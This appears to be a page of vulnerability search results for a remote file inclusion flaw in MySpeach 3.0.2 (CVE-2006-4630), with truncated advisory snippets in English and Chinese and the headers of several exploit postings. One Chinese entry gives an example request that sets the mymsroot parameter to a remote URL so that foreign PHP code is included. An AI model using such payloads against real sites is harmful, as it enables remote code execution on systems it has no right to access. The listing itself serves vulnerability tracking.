6 matches found
MySpeach <= 3.0.2 (my_ms[root]) Remote File Include Vulnerability
No description provided by source. ============================================================================================== MySpeach = v3.0.2 mymsroot Remote File Inclusion Exploit =============================================================================================== Critical Level...
MySpeach JScript.PHP远程文件包含漏洞
MySpeach是一款基于PHP的WEB应用程序。 MySpeach不正确过滤用户提交的URI数据,远程攻击者可以利用漏洞以WEB进程权限执行任意命令。 问题是由于'JScript.PHP'脚本对用户提交的'mymsroot'参数缺少过滤,提交恶意的远程服务器作为包含对象,可导致以WEB进程权限执行任意PHP代码。 MySpeach MySpeach 3.0.2 http://www.myspeach.com/ http://www.example.com/Script Path/jscript.php?mymsroot=http://www.example.com...
CVE-2006-4630
CVE-2006-4630 describes a PHP remote file inclusion in jscript.php for Sky GUNNING MySpeach 3.0.2 and earlier. When register_globals is enabled, an attacker can cause arbitrary PHP code execution via a URL in the my_ms[root] parameter. Affected versions are 3.0.2 and earlier; impact is remote cod...
MySpeach 3.0.2 - 'my_ms[root]' Remote File Inclusion
============================================================================================== MySpeach = v3.0.2 mymsroot Remote File Inclusion Exploit =============================================================================================== Critical Level : Very Dangerous Venedor site :...
MySpeach <= 3.0.2 (my_ms[root]) Remote File Include Vulnerability
Exploit for unknown platform in category web applications ================================================================= MySpeach = 3.0.2 mymsroot Remote File Include Vulnerability =================================================================...
MySpeach <= v3.0.2 (my_ms[root]) Remote File Inclusion Exploit
============================================================================================== MySpeach = v3.0.2 mymsroot Remote File Inclusion Exploit =============================================================================================== Critical Level : Very Dangerous Venedor site :...